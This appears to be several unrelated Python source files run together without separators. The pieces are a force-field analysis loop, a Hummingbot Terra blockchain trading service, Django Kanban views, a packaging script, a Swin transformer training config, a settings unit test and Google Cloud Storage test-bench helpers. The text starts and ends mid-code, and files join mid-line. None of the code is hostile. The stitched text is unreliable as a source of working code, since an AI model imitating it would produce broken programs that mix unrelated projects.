+ str(index[smiles]) + ".smiles_with."+"{:s}."*len(param_list)+"txt").format(*param_list) #if(os.path.exists(smiles_out_fname)): # print_header = False with open(smiles_out_fname, 'w') as fid: for measure in measurements: mol_label_count = 0 for label in params[measure]: if((label not in bond_r0) ): continue label_count = 0 #r0 = float(str(bond_r0[label]).split()[0]) r0 = bond_r0[label] / bond_r0[label].unit force_k = bond_k[label] / bond_k[label].unit delta = 2*kT/force_k**.5 smirks = bond_dict[label]['smirks'] #delta *= 180/np.pi #pass if(measure in ["Angles", "ImproperTorsions", "ProperTorsions"] ): delta = 2*kT/(force_k * (np.pi/180)**2 )**.5 if(print_header): fid.write("# {:3s} {:24s} \n".format(label, smirks)) fid.write("# r0 = {:6.2f}, k = {:6.2f} kT-> {:6.2f}\n".format(r0, force_k, delta)) fid.write("#{:4s} {:5s} {:4s} {:60s} {:10s} {:10s} {:10s} {:10s} {:10s}\n".format("idx", "count", "flag", "category", "ffRMS(L)", "ffRMS(E)", "measL", "measRMS(L)", "measRMS(E)")) if(measure in ["Angles", "ImproperTorsions", "ProperTorsions"] ): force_k = force_k * (np.pi/180)**2 # put into degrees #num *= np.pi/180 #print([(smiles, mdatamean[smiles]) for smiles in smiles_hits]) dat = [] outstr = [] per_term_flag = "G" flag = "G" bond_indices = [] valence_term = {} for idx,smiles in zip(smiles_idx,smiles_hits): for index_key, index_dat in m["mol_data"][smiles][measure]["indices"].items(): if(index_dat['oFF'] == label): bond_indices.append(index_key) valence_term[index_key] = [] for index_key in valence_term: single_terms = [] index_count = 0 for idx,smiles in zip(smiles_idx,smiles_hits): try: col_idx = m["mol_data"][smiles][measure]["indices"][index_key]["column_idx"] except KeyError as e: logger.warning("\n** Missing" + str(e) + ": Probably different molecules with same smiles. Check the output! 
** ") continue vals = np.atleast_1d(m["mol_data"][smiles][measure]["values"][:,col_idx]) valence_term[index_key] = np.append(valence_term[index_key], vals) flag = "G" if((vals < (r0 - delta)).any() or (vals > (r0 + delta)).any()): flag = "R" elif(vals.max() < r0 or vals.min() > r0): flag = "Y" avglen = vals.mean() rmslen = rms(vals - r0) rmsene = rms(force_k/2 * (vals - r0)**2) mrmslen = rms(vals - avglen) mrmsene = rms(force_k/2 * (vals - avglen)**2) single_terms.append((" {:4d} {:5d} {:>4s} {:60s} " + rms_str + "\n").format(jj,len(vals), flag,"--->conformation "+ get_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) if(vals.size > 1): for kk,val in enumerate(vals): flag = "G" if((val < (r0 - delta)) or (val > (r0 + delta))): flag = "R" elif(val < r0 or val > r0): flag = "X" avglen = val rmslen = rms(val - r0) rmsene = rms(force_k/2 * (val - r0)**2) mrmslen = rms(val - avglen) mrmsene = rms(force_k/2 * (val - avglen)**2) single_terms.append((" {:4d} {:5d} {:>4s} {:60s} " + rms_str + "\n").format(jj,1, flag,".....>intermediate "+str(kk),rmslen, rmsene, avglen, mrmslen, mrmsene)) index_count += len(vals) avglen = valence_term[index_key].mean() rmslen = rms(valence_term[index_key] - r0) rmsene = rms(force_k/2 * (valence_term[index_key] - r0)**2) mrmslen = rms(valence_term[index_key] - avglen) mrmsene = rms(force_k/2 * (valence_term[index_key] - avglen)**2) flag = "G" if((valence_term[index_key] < (r0 - delta)).any() or (valence_term[index_key] > (r0 + delta)).any()): flag = "R" elif(valence_term[index_key].max() < r0 or valence_term[index_key].min() > r0): flag = "Y" outstr.append((" {:4d} {:5d} {:>4s} {:60s} " + rms_str + "\n").format(jj, index_count, flag,"==>atoms " + str(index_key),rmslen, rmsene, avglen, mrmslen, mrmsene)) [outstr.append(term) for term in single_terms] dat = np.append(dat, valence_term[index_key]) #if(measure == "Angles"): # pass #dat *= np.pi/180 mol_label_count += len(dat) if(len(dat) > 0): flag = "G" if((dat < (r0 - delta)).any() or (dat > (r0 + delta)).any()): flag = "R" elif(dat.max() < r0 or dat.min() > r0): flag = "Y" avglen = dat.mean() rmslen = rms(dat - r0) rmsene = rms(force_k/2 * (dat - r0)**2) mrmslen = rms(dat - avglen) mrmsene = rms(force_k/2 * (dat - avglen)**2) fid.write((" {:4d} {:5d} {:>4s} {:60s} " + rms_str + "\n").format(jj,mol_label_count, flag,"|>molecule " + strip_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) [fid.write(s) for s in outstr] print(rms_str.format(rmslen, rmsene, avglen, mrmslen, mrmsene), end=" ") fragstr = "all" # ene_str="{:s}: meanE= {:9.4f} RMS(E)= {:9.4} maxAngEne= {:9.4f} {:9.4f}" # ene_maxdel_str="DmeanE= {:9.4f} maxDiffAngEne= {:9.4f} {:9.4f} maxGapAngEne {:9.4f} {:9.4f}" # ref_ene_key = 'qm' # if len(params["Energy"]) > 1: with open(ene_out_fname, 'a') as fid: measure = "Energy" mol_label_count = 0 ref_ene = np.array(mdata[ref_ene_key]) logger.debug("VAR: ref_ene= " + str(ref_ene)) ref_ene_max_idx = ref_ene.argmax() td_ang = m["td_ang"][m["mol_data"][smiles]["td_ang"]] if(td_ang[0] == None): continue fid.write((" {:4d} {:5d} {:>4s} {:60s} " + ene_str + "\n").format(jj,len(ref_ene), "REF","|>molecule " + strip_conformation_number(smiles),ref_ene_key, ref_ene.mean(), rms(ref_ene - ref_ene.mean()), td_ang[ref_ene_max_idx], ref_ene[ref_ene_max_idx])) ene_list = {x:y for x,y in params["Energy"].items() if x != "qm"} for ene_group in ene_list: for ene_type in ene_list[ene_group]: label = ".".join((ene_group, ene_type)) ene = np.array(mdata[label]) ene_max_idx = ene.argmax() delta = 
ene - ref_ene delta_max_idx = np.abs(delta).argmax() fid.write((" {:4d} {:5d} {:>4s} {:60s} " + ene_str + " " + ene_maxdel_str +"\n").format(jj,len(ene), "","==> " + label, "", ene.mean(), rms(ene - ene.mean()), td_ang[ene_max_idx], ene[ene_max_idx], ene.mean() - ref_ene.mean(), td_ang[ene_max_idx] - td_ang[ref_ene_max_idx], ene[ene_max_idx] - ref_ene[ref_ene_max_idx], td_ang[delta_max_idx], delta[delta_max_idx])) # need argmax of ref for angle and ene # need mean angle # for label in params[measure]: # if(("qm" not in label) or ("oFF" not in label)): # continue # label_count = 0 # #r0 = float(str(bond_r0[label]).split()[0]) # # #delta *= 180/np.pi # #pass # if(print_header): # fid.write("#{:4s} {:5s} {:4s} {:50s} {:10s} {:10s} {:10s} {:10s} {:10s}\n".format("idx", "count", "flag", "category", "ffRMS(L)", "ffRMS(E)", "measL", "measRMS(L)", "measRMS(E)")) # # #need argmax of angle and ene # # need argmax of different between data and ref # # # have a reference ene (the qm) # dat = [] # outstr = [] # per_term_flag = "X" # flag = "X" # bond_indices = [] # valence_term = {} # # # single_terms = [] # index_count = 0 # for idx,smiles in zip(smiles_idx,smiles_hits): # try: # col_idx = m["mol_data"][smiles][measure]["indices"][index_key]["column_idx"] # except KeyError as e: # logger.warning("\n** Missing" + str(e) + ": Probably different molecules with same smiles. Check the output! ** ") # continue # vals = np.atleast_1d(m["mol_data"][smiles][measure]["values"][:,col_idx]) # valence_term[index_key] = np.append(valence_term[index_key], vals) # flag = "G" # if((vals < (r0 - delta)).any() or (vals > (r0 + delta)).any()): # flag = "R" # elif(vals.max() < r0 or vals.min() > r0): # flag = "Y" # avglen = vals.mean() # rmslen = rms(vals - r0) # rmsene = rms(force_k/2 * (vals - r0)**2) # mrmslen = rms(vals - avglen) # mrmsene = rms(force_k/2 * (vals - avglen)**2) # single_terms.append((" {:4d} {:5d} {:>4s} {:50s} " + rms_str + "\n").format(jj,len(vals), flag,"--->conformation "+ get_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) # if(vals.size > 1): # for kk,val in enumerate(vals): # flag = "G" # if((val < (r0 - delta)) or (val > (r0 + delta))): # flag = "R" # elif(val < r0 or val > r0): # flag = "X" # avglen = val # rmslen = rms(val - r0) # rmsene = rms(force_k/2 * (val - r0)**2) # mrmslen = rms(val - avglen) # mrmsene = rms(force_k/2 * (val - avglen)**2) # single_terms.append((" {:4d} {:5d} {:>4s} {:50s} " + rms_str + "\n").format(jj,1, flag,".....>intermediate "+str(kk),rmslen, rmsene, avglen, mrmslen, mrmsene)) # index_count += len(vals) # avglen = valence_term[index_key].mean() # rmslen = rms(valence_term[index_key] - r0) # rmsene = rms(force_k/2 * (valence_term[index_key] - r0)**2) # mrmslen = rms(valence_term[index_key] - avglen) # mrmsene = rms(force_k/2 * (valence_term[index_key] - avglen)**2) # # flag = "G" # if((valence_term[index_key] < (r0 - delta)).any() or (valence_term[index_key] > (r0 + delta)).any()): # flag = "R" # elif(valence_term[index_key].max() < r0 or valence_term[index_key].min() > r0): # flag = "Y" # outstr.append((" {:4d} {:5d} {:>4s} {:50s} " + rms_str + "\n").format(jj, index_count, flag,"==>atoms " + str(index_key),rmslen, rmsene, avglen, mrmslen, mrmsene)) # [outstr.append(term) for term in single_terms] # dat = np.append(dat, valence_term[index_key]) # # #if(measure == "Angles"): # # pass # #dat *= np.pi/180 # # mol_label_count += len(dat) # if(len(dat) > 0): # flag = "G" # if((dat < (r0 - delta)).any() or (dat > (r0 + delta)).any()): # flag = "R" 
# elif(dat.max() < r0 or dat.min() > r0): # flag = "Y" # avglen = dat.mean() # rmslen = rms(dat - r0) # rmsene = rms(force_k/2 * (dat - r0)**2) # mrmslen = rms(dat - avglen) # mrmsene = rms(force_k/2 * (dat - avglen)**2) # # fid.write((" {:4d} {:5d} {:>4s} {:50s} " + rms_str + "\n").format(jj,mol_label_count, flag,"|>molecule " + strip_conformation_number(smiles), rmslen, rmsene, avglen, mrmslen, mrmsene)) # [fid.write(s) for s in outstr] # print(rms_str.format(rmslen, rmsene, avglen, mrmslen, mrmsene), end=" ") if("fragment" in m): fragstr = m["fragment"] fig.suptitle(("frag={:s} " + "{:s}").format(fragstr,smiles)) fig.savefig("fig.mol_" + str(index[smiles]) + "." + param_str +"png") plt.close(fig) print() hummingbot/strategy/oracle_sniper_limit/terra_service.py import asyncio import requests import string,os,time,sys,json from decimal import Decimal from terra_sdk.client.lcd import LCDClient, AsyncLCDClient from terra_sdk.key.mnemonic import MnemonicKey from terra_sdk.core import Coin, Coins from terra_sdk.core.bank.msgs import MsgSend from terra_sdk.core.market import MsgSwap from terra_sdk.client.lcd.api.oracle import OracleAPI from terra_sdk.client.lcd.api.staking import StakingAPI from terra_sdk.client.lcd.api.wasm import WasmAPI from terra_sdk.core.wasm import MsgStoreCode, MsgInstantiateContract, MsgExecuteContract from terra_sdk.core.auth.data.tx import StdFee from hummingbot.strategy.oracle_sniper_limit.singleton import Singleton from hummingbot.core.utils.async_utils import safe_ensure_future @Singleton class TerraService(): # We use StrategyPyBase to inherit the structure. We also # create a logger object before adding a constructor to the class. chain_id = 'columbus-5' chain_url = 'https://lcd.terra.dev' def __init__(self): self.mk = None self.wallet = None self.terra = None self._main_task = None self.is_ready = True if self._main_task is None or self._main_task.done(): self._main_task = safe_ensure_future(self.main()) async def main(self): await self.create_client() def test(self): print("test") async def create_client(self): print("creating terraswap client...") res = self.request_updated_gas_prices() async with AsyncLCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") as terra: self.terra = terra SECRET_TERRA_MNEMONIC = os.getenv('SECRET_TERRA_MNEMONIC') if os.getenv("SECRET_TERRA_MNEMONIC") is not None: self.mk = MnemonicKey(mnemonic=SECRET_TERRA_MNEMONIC) self.wallet = self.terra.wallet(self.mk) bal = await self.request_updated_wallet_balance() else: print("Something Went Wrong. 
Hummingbot shutting down now...") time.sleep(3) sys.exit("Something Went Wrong!") self.load_files() self.pull_api_info() async def request_updated_wallet_balance(self): print("checking available balance...") res = self.request_updated_gas_prices() async with AsyncLCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") as terra: self.terra = terra self.balance = await self.terra.bank.balance(self.mk.acc_address) return self.balance async def contract_query(self, pool): res = self.request_updated_gas_prices() async with AsyncLCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") as terra: self.terra = terra assets = await self.terra.wasm.contract_query(pool, { "pool": {} }) return assets # Utils def balance_above_min_threshold(self, balance, currency, threshold): print("balance_above_min_threshold", balance, currency, threshold) if balance.get(currency) is not None: coinbal = balance[currency] return coinbal.amount > int(threshold) else: return False def coin_to_denom(self, coin): target = '' cwd = os.getcwd() coin_to_denom = json.load(open(cwd+'/hummingbot/strategy/limit_order/coin_to_denom.json')) for attribute, value in coin_to_denom.items(): # print(attribute, value) # example usage if coin == attribute: # Get coin denomination from Trading Pair name target = value return target def get_balance_from_wallet(self, balance, base): print("get_balance_from_wallet", balance, base) if balance.get(base) is not None: coinbalance = balance[base] return coinbalance else: return False # Public api.terraswap.io Library Methods def request_updated_gas_prices(self): self.gas_prices = requests.get("https://fcd.terra.dev/v1/txs/gas_prices").json() def pull_api_info(self): self.request_cw20_tokens() self.request_cw20_pairs() self.request_asset_info_pairs() def get_tokens(self): return self.request_cw20_tokens() def get_pair_txs(self, pair_address:string): txns = requests.get('https://api.terraswap.io/dashboard/txs?page=1&pair='+pair_address).json() return txns def get_pair_pricing(self, pair_address): pricing = requests.get('https://api.terraswap.io/dashboard/pairs/'+pair_address).json() return pricing def get_token_pricing(self, pair_address, symbol): pricing = requests.get('https://api.terraswap.io/dashboard/pairs/'+pair_address).json() token = [] if pricing.get("token0") is not None: if pricing["token0"]["symbol"] == symbol: token = pricing["token0"] if pricing.get("token1") is not None: if pricing["token1"]["symbol"] == symbol: token = pricing["token1"] return token def get_currency_amount_from_wallet_balance(self, balance, currency): print("get_currency_amount_from_wallet_balance", balance, currency) amount = 0 if balance.get(currency) is not None: amount = balance[currency].amount else: amount = 0 return amount def get_base_tx_size_from_balance(self, balance, currency, DEFAULT_BASE_TX_SIZE): print("get_base_tx_size_from_balance", balance, currency, DEFAULT_BASE_TX_SIZE) if balance.get(currency) is not None: amount = balance[currency].amount size = amount*float(DEFAULT_BASE_TX_SIZE) else: size = 0 return int(size) def request_cw20_tokens(self): self.cw20_tokens = requests.get('https://api.terraswap.io/tokens').json() return self.cw20_tokens def request_cw20_pairs(self): self.cw20_pairs = requests.get('https://api.terraswap.io/dashboard/pairs').json() return self.cw20_pairs def request_asset_info_pairs(self): self.asset_info_pairs = requests.get('https://api.terraswap.io/pairs').json() return 
self.asset_info_pairs def load_files(self): self.open_cw20() self.open_ibc() self.open_fcw20pairs() self.open_coin_to_denom() # local terraswap methods def open_cw20(self): self.cw20_json = json.load(open(os.getcwd()+'/hummingbot/strategy/limit_order/cw20.json')) return self.cw20_json def open_ibc(self): self.ibc_json = json.load(open(os.getcwd()+'/hummingbot/strategy/limit_order/ibc.json')) return self.ibc_json def open_fcw20pairs(self): self.cw20pairs_json = json.load(open(os.getcwd()+'/hummingbot/strategy/limit_order/pairs.dex.json')) return self.cw20pairs_json def open_coin_to_denom(self): self.coin_to_denom_json = json.load(open(os.getcwd()+'/hummingbot/strategy/limit_order/coin_to_denom.json')) return self.coin_to_denom_json # Contract Methods async def broadcast_tx(self, tx): res = self.request_updated_gas_prices() async with AsyncLCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") as terra: self.terra = terra async def send(self, recipient_wallet_addr, coins): wallet = self.terra.wallet(self.mk) account_number = await wallet.account_number() tx = await wallet.create_and_sign_tx( msgs=[MsgSend(wallet.key.acc_address, recipient_wallet_addr, coins)] ) result = self.terra.tx.broadcast(tx) async def coin_swap(self, tx_size, offer_target, ask_target): # Get reference to wallet wallet = self.terra.wallet(self.mk) account_number = await wallet.account_number() swap = MsgSwap(self.mk.acc_address, str(tx_size)+''+offer_target, ask_target) sequence = self.wallet.sequence() tx = await wallet.create_and_sign_tx( msgs=[swap], gas_prices=Coins(self.gas_prices), gas_adjustment='1.4', sequence=sequence ) result = self.terra.tx.broadcast(tx) def token_swap(self, pool, amount, sellinfo, belief_price, max_spread=0.5): # Get reference to wallet res = self.request_updated_gas_prices() terra = LCDClient(chain_id="columbus-5", url="https://lcd.terra.dev", gas_prices=Coins(res), gas_adjustment="1.4") wallet = terra.wallet(self.mk) seq = wallet.sequence() account_number = wallet.account_number() gp = self.gas_prices.get(sellinfo['native_token']['denom'])+sellinfo['native_token']['denom'] # print("account_number") # print(account_number) swp = { "swap": { "max_spread": max_spread, "offer_asset": { "info": sellinfo, "amount": str(amount) }, "belief_price": belief_price } } print(swp) swap = MsgExecuteContract( sender=wallet.key.acc_address, contract=pool, execute_msg=swp, coins=Coins.from_str(str(amount)+''+sellinfo['native_token']['denom']), ) print(swap) print('dynamic gas: ',gp) tx = wallet.create_and_sign_tx( msgs=[swap], gas_prices=gp, gas_adjustment='1.4', sequence = seq ) print(tx) return terra.tx.broadcast(tx)diegojromerolopez/djanbansrc/djanban/apps/multiboards/views/multiboards.py # -*- coding: utf-8 -*- from __future__ import unicode_literals, absolute_import import hashlib import time from datetime import timedelta import pydenticon from django.conf import settings from django.contrib.auth.decorators import login_required from django.core.files.base import ContentFile from django.core.urlresolvers import reverse from django.db.models import Q from django.http import HttpResponseRedirect from django.http.response import Http404, HttpResponse from django.shortcuts import render, get_object_or_404 from djanban.apps.base.auth import user_is_member, get_user_boards, user_is_visitor from djanban.apps.base.decorators import member_required from djanban.apps.boards.forms import EditBoardForm, NewBoardForm, NewListForm, LabelForm, EditListForm from 
djanban.apps.boards.models import List, Board, Label from djanban.apps.boards.stats import avg, std_dev from djanban.apps.fetch.fetchers.trello.boards import Initializer, BoardFetcher from djanban.apps.multiboards.forms import MultiboardForm, DeleteMultiboardForm, LeaveMultiboardForm from djanban.apps.multiboards.models import Multiboard from djanban.utils.week import get_week_of_year, get_weeks_of_year_since_one_year_ago @member_required def view_list(request): return _view_list(request, archived=False) @member_required def view_archived_list(request): return _view_list(request, archived=True) def _view_list(request, archived): member = request.user.member multiboards = member.multiboards.filter(is_archived=archived).order_by("order", "name") replacements = {"multiboards": multiboards, "archived": archived, "member": member} return render(request, "multiboards/list.html", replacements) # New multiboard @member_required def new(request): member = request.user.member multiboard = Multiboard(creator=member) if request.method == "POST": form = MultiboardForm(request.POST, instance=multiboard) if form.is_valid(): form.save(commit=True) return HttpResponseRedirect(reverse("multiboards:list")) else: form = MultiboardForm(instance=multiboard) return render(request, "multiboards/new.html", {"form": form, "member": member}) # View a multiboard @member_required def view(request, multiboard_id): member = request.user.member try: multiboard = member.multiboards.get(id=multiboard_id, is_archived=False) except Multiboard.DoesNotExist: raise Http404 replacements = { "multiboard": multiboard, "member": member, "members": multiboard.members.all(), "boards": multiboard.boards.filter(is_archived=False).order_by("name") } return render(request, "multiboards/view.html", replacements) # View a multiboard's task board @member_required def view_task_board(request, multiboard_id): member = request.user.member try: multiboard = member.multiboards.get(id=multiboard_id, is_archived=False) except Multiboard.DoesNotExist: raise Http404 replacements = { "multiboard": multiboard, "member": member, "boards": multiboard.boards.filter(is_archived=False).order_by("name") } return render(request, "multiboards/view_task_board.html", replacements) # Edition of multiboard @member_required def edit(request, multiboard_id): member = request.user.member try: multiboard = member.created_multiboards.get(id=multiboard_id) except Multiboard.DoesNotExist: raise Http404 if request.method == "POST": form = MultiboardForm(request.POST, instance=multiboard) if form.is_valid(): form.save(commit=True) return HttpResponseRedirect(reverse("multiboards:list")) else: form = MultiboardForm(instance=multiboard) return render(request, "multiboards/edit.html", {"form": form, "multiboard": multiboard, "member": member}) # Delete a multiboard @member_required def delete(request, multiboard_id): member = request.user.member try: multiboard = member.created_multiboards.get(id=multiboard_id) except Multiboard.DoesNotExist: raise Http404 if request.method == "POST": form = DeleteMultiboardForm(request.POST) if form.is_valid() and form.cleaned_data.get("confirmed"): multiboard.delete() return HttpResponseRedirect(reverse("multiboards:list")) else: form = DeleteMultiboardForm() return render(request, "multiboards/delete.html", {"form": form, "multiboard": multiboard, "member": member}) # Leave a multiboard @member_required def leave(request, multiboard_id): member = request.user.member try: multiboard = member.multiboards.get(id=multiboard_id) except 
Multiboard.DoesNotExist: raise Http404 if member.id == multiboard.creator.id: return render(request, "multiboards/leave.html", {"multiboard": multiboard, "member": member}) if request.method == "POST": form = LeaveMultiboardForm(request.POST) if form.is_valid() and form.cleaned_data.get("confirmed"): multiboard.members.remove(member) return HttpResponseRedirect(reverse("multiboards:list")) else: form = LeaveMultiboardForm() return render(request, "multiboards/leave.html", {"form": form, "multiboard": multiboard, "member": member}) #!/usr/bin/env python from os.path import abspath, dirname, join as pjoin import zipfile SRC_DIR = dirname(abspath(__file__)) with zipfile.ZipFile('add_mesh_SpaceshipGenerator.zip', 'w', zipfile.ZIP_DEFLATED) as arch: for filename in [ '__init__.py', 'spaceship_generator.py', 'textures/hull_normal.png', 'textures/hull_lights_emit.png', 'textures/hull_lights_diffuse.png']: arch.write(pjoin(SRC_DIR, filename), 'add_mesh_SpaceshipGenerator/'+filename) print('created file: add_mesh_SpaceshipGenerator.zip') _base_ = [ '../_base_/models/swin_transformer/large_384.py', '../_base_/datasets/cub_bs8_384.py', '../_base_/schedules/cub_bs64.py', '../_base_/default_runtime.py' ] # model settings checkpoint = 'https://download.openmmlab.com/mmclassification/v0/swin-transformer/convert/swin-large_3rdparty_in21k-384px.pth' # noqa model = dict( type='ImageClassifier', backbone=dict( init_cfg=dict( type='Pretrained', checkpoint=checkpoint, prefix='backbone')), head=dict(num_classes=200, )) paramwise_cfg = dict( norm_decay_mult=0.0, bias_decay_mult=0.0, custom_keys={ '.absolute_pos_embed': dict(decay_mult=0.0), '.relative_position_bias_table': dict(decay_mult=0.0) }) optimizer = dict( _delete_=True, type='AdamW', lr=5e-6, weight_decay=0.0005, eps=1e-8, betas=(0.9, 0.999), paramwise_cfg=paramwise_cfg) optimizer_config = dict(grad_clip=dict(max_norm=5.0), _delete_=True) log_config = dict(interval=20) # log every 20 intervals checkpoint_config = dict( interval=1, max_keep_ckpts=3) # save last three checkpoints import unittest from sultan.config import Settings class TestSettings(unittest.TestCase): def setUp(self): self.settings = Settings() def test_default_settings_loaded(self): self.assertEqual(self.settings.HALT_ON_ERROR, True) def test_log_format(self): self.assertEqual(self.settings.LOG_FORMAT, '%(log_color)s[%(name)s]: %(message)s') def test_log_colors(self): self.assertEqual(self.settings.LOG_COLORS, { 'DEBUG': 'cyan', 'INFO': 'green', 'WARNING': 'yellow', 'ERROR': 'red', 'CRITICAL': 'bold_red', })#!/usr/bin/env python # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Standalone helpers for the Google Cloud Storage test bench.""" import base64 import error_response import hashlib import json import random import re import socket import struct import time def validate_bucket_name(bucket_name): """Return True if bucket_name is a valid bucket name. 
Bucket naming requirements are described in: https://cloud.google.com/storage/docs/naming Note that this function does not verify domain bucket names: https://cloud.google.com/storage/docs/domain-name-verification :param bucket_name:str the name to validate. :rtype: bool """ valid = True if "." in bucket_name: valid &= len(bucket_name) <= 222 valid &= all([len(part) <= 63 for part in bucket_name.split(".")]) else: valid &= len(bucket_name) <= 63 valid &= re.match("^[a-z0-9][a-z0-9._\\-]+[a-z0-9]$", bucket_name) is not None valid &= not bucket_name.startswith("goog") valid &= re.search("g[0o][0o]g[1l][e3]", bucket_name) is None valid &= ( re.match("^[0-9]{1,3}[.][0-9]{1,3}[.][0-9]{1,3}[.][0-9]{1,3}$", bucket_name) is None ) return valid def canonical_entity_name(entity): """Convert entity names to their canonical form. Some entities (notably project--) have more than one name, for example the project-owners- entities are called project-owners- internally. This function :param entity:str convert this entity to its canonical name. :return: the name in canonical form. :rtype:str """ if entity == "allUsers" or entity == "allAuthenticatedUsers": return entity if entity.startswith("project-owners-"): entity = "project-owners-123456789" if entity.startswith("project-editors-"): entity = "project-editors-123456789" if entity.startswith("project-viewers-"): entity = "project-viewers-123456789" return entity.lower() def index_acl(acl): """Return a ACL as a dictionary indexed by the 'entity' values of the ACL. We represent ACLs as lists of dictionaries, that makes it easy to convert them to JSON objects. When changing them though, we need to make sure there is a single element in the list for each `entity` value, so it is convenient to convert the list to a dictionary (indexed by `entity`) of dictionaries. This function performs that conversion. :param acl:list of dict :return: the ACL indexed by the entity of each entry. :rtype:dict """ # This can be expressed by a comprehension but turns out to be less # readable in that form. indexed = dict() for e in acl: indexed[e["entity"]] = e return indexed def filter_fields_from_response(fields, response): """Format the response as a JSON string, using any filtering included in the request. :param fields:str the value of the `fields` parameter in the original request. :param response:dict a dictionary to be formatted as a JSON string. :return: the response formatted as a string. :rtype:str """ if fields is None: return json.dumps(response) tmp = {} # TODO(#1037) - support full filter expressions for key in fields.split(","): if key in response: tmp[key] = response[key] return json.dumps(tmp) def filtered_response(request, response): """Format the response as a JSON string, using any filtering included in the request. :param request:flask.Request the original HTTP request. :param response:dict a dictionary to be formatted as a JSON string. :return: the response formatted as a string. :rtype:str """ fields = request.args.get("fields") return filter_fields_from_response(fields, response) def raise_csek_error(code=400): msg = "Missing a SHA256 hash of the encryption key, or it is not" msg += " base64 encoded, or it does not match the encryption key." 
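# Descriptive note (added comment): the dict built below follows the JSON API error envelope,
# i.e. a top-level "error" object holding an "errors" list plus "code" and "message"; it is
# serialized with json.dumps and raised via error_response.ErrorResponse just after.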
link = "https://cloud.google.com/storage/docs/encryption#customer-supplied_encryption_keys" error = { "error": { "errors": [ { "domain": "global", "reason": "customerEncryptionKeySha256IsInvalid", "message": msg, "extendedHelp": link, } ], "code": code, "message": msg, } } raise error_response.ErrorResponse(json.dumps(error), status_code=code) def validate_customer_encryption_headers( key_header_value, hash_header_value, algo_header_value ): """Verify that the encryption headers are internally consistent. :param key_header_value: str the value of the x-goog-*-key header :param hash_header_value: str the value of the x-goog-*-key-sha256 header :param algo_header_value: str the value of the x-goog-*-key-algorithm header :rtype: NoneType """ try: if algo_header_value is None or algo_header_value != "AES256": raise error_response.ErrorResponse( "Invalid or missing algorithm %s for CSEK" % algo_header_value, status_code=400, ) key = base64.standard_b64decode(key_header_value) if key is None or len(key) != 256 / 8: raise_csek_error() h = hashlib.sha256() h.update(key) expected = base64.standard_b64encode(h.digest()).decode("utf-8") if hash_header_value is None or expected != hash_header_value: raise_csek_error() except error_response.ErrorResponse: # error_response.ErrorResponse indicates that the request was invalid, just pass # that exception through. raise except Exception: # Many of the functions above may raise, convert those to an # error_response.ErrorResponse with the right format. raise_csek_error() def json_api_patch(original, patch, recurse_on=set({})): """Patch a dictionary using the JSON API semantics. Patches are applied using the following algorithm: - patch is a dictionary representing a JSON object. JSON `null` values are represented by None). - For fields that are not in `recursive_fields`: - If patch contains {field: None} the field is erased from `original`. - Otherwise `patch[field]` replaces `original[field]`. - For fields that are in `recursive_fields`: - If patch contains {field: None} the field is erased from `original`. - If patch contains {field: {}} the field is left untouched in `original`, note that if the field does not exist in original this means it is not created. - Otherwise patch[field] is treated as a patch and applied to `original[field]`, potentially creating the new field. :param original:dict the dictionary to patch :param patch:dict the patch to apply. Elements pointing to None are removed, other elements are replaced. :param recurse_on:set of strings, the names of fields for which the patch is applied recursively. :return: the updated dictionary :rtype:dict """ tmp = original.copy() for key, value in patch.items(): if value is None: tmp.pop(key, None) elif key not in recurse_on: tmp[key] = value elif len(value) != 0: tmp[key] = json_api_patch(original.get(key, {}), value) return tmp def extract_media(request): """Extract the media from a flask Request. To avoid race conditions when using greenlets we cannot perform I/O in the constructor of GcsObjectVersion, or in any of the operations that modify the state of the service. Because sometimes the media is uploaded with chunked encoding, we need to do I/O before finishing the GcsObjectVersion creation. If we do this I/O after the GcsObjectVersion creation started, the the state of the application may change due to other I/O. :param request:flask.Request the HTTP request. :return: the full media of the request. 
:rtype: str """ if request.environ.get("HTTP_TRANSFER_ENCODING", "") == "chunked": return request.environ.get("wsgi.input").read() return request.data def corrupt_media(media): """Return a randomly modified version of a string. :param media:bytes a string (typically some object media) to be modified. :return: a string that is slightly different than media. :rtype: str """ # Deal with the boundary condition. if not media: return bytearray(random.sample("abcdefghijklmnopqrstuvwxyz", 1), "utf-8") return b"B" + media[1:] if media[0:1] == b"A" else b"A" + media[1:] # Define the collection of Buckets indexed by GCS_BUCKETS = dict() def lookup_bucket(bucket_name): """Lookup a bucket by name in the global collection. :param bucket_name:str the name of the Bucket. :return: the bucket matching the name. :rtype:GcsBucket :raises:ErrorResponse if the bucket is not found. """ bucket = GCS_BUCKETS.get(bucket_name) if bucket is None: raise error_response.ErrorResponse( "Bucket %s not found" % bucket_name, status_code=404 ) return bucket def has_bucket(bucket_name): """Return True if the bucket already exists in the global collection.""" return GCS_BUCKETS.get(bucket_name) is not None def insert_bucket(bucket_name, bucket): """Insert (or replace) a new bucket into the global collection. :param bucket_name:str the name of the bucket. :param bucket:GcsBucket the bucket to insert. """ GCS_BUCKETS[bucket_name] = bucket def delete_bucket(bucket_name): """Delete a bucket from the global collection.""" GCS_BUCKETS.pop(bucket_name) def all_buckets(): """Return a key,value iterator for all the buckets in the global collection. :rtype:dict[str, GcsBucket] """ return GCS_BUCKETS.items() # Define the collection of GcsObjects indexed by /o/ GCS_OBJECTS = dict() def lookup_object(bucket_name, object_name): """Lookup an object by name in the global collection. :param bucket_name:str the name of the Bucket that contains the object. :param object_name:str the name of the Object. :return: tuple the object path and the object. :rtype: (str,GcsObject) :raises:ErrorResponse if the object is not found. """ object_path, gcs_object = get_object(bucket_name, object_name, None) if gcs_object is None: raise error_response.ErrorResponse( "Object %s in %s not found" % (object_name, bucket_name), status_code=404 ) return object_path, gcs_object def 